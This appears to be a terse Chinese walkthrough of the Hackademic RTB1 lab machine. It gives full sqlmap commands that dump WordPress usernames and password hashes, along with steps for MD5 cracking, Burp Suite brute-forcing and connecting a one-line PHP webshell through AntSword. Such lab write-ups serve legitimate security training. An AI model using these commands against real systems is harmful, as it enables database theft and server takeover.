查看靶机的MAC地址

使用nmap进行扫描

使用dirsearch进行目录扫描

网站登录

点击紫色字体

进一步进行目录扫描

进行拼接
拼接wp-content

拼接wp-includes

点击Got root

测试发现不存在SQL注入
点击posted in Uncategorized

测试发现存在SQL注入
测试数据库
python sqlmap.py -u "http://192.168.112.129/Hackademic_RTB1/?cat=1" --current-db --batch

库名为wordpress
测试表名
python sqlmap.py -u "http://192.168.112.129/Hackademic_RTB1/?cat=1" -D wordpress --tables --batch

测试表中字段
python sqlmap.py -u "http://192.168.112.129/Hackademic_RTB1/?cat=1" -D wordpress --T wp_users --columns --batch

测试用户名
python sqlmap.py -u "http://192.168.112.129/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users -C user_login --dump --batch

测试密码
python sqlmap.py -u "http://192.168.112.129/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users -C user_pass --dump --batch

密码最后以为加密,使用MD5进行解密

进行用户名和密码的匹配
使用bursuite进行暴力破解

登录
查看phpinfo()

一句话木马连接蚁剑











![sqlserver同一数据库还原实例冲突可以用[文件和文件组]来备份解决](https://i-blog.csdnimg.cn/direct/763f5a91db6a483ba470b651644a3395.jpeg)






![[独家原创]基于(牛顿拉夫逊)NRBO-TCN多变量回归预测(多输入单输出) Matlab代码](https://img-blog.csdnimg.cn/img_convert/65f88b13fb770f41db58c75b7669b6cd.png)

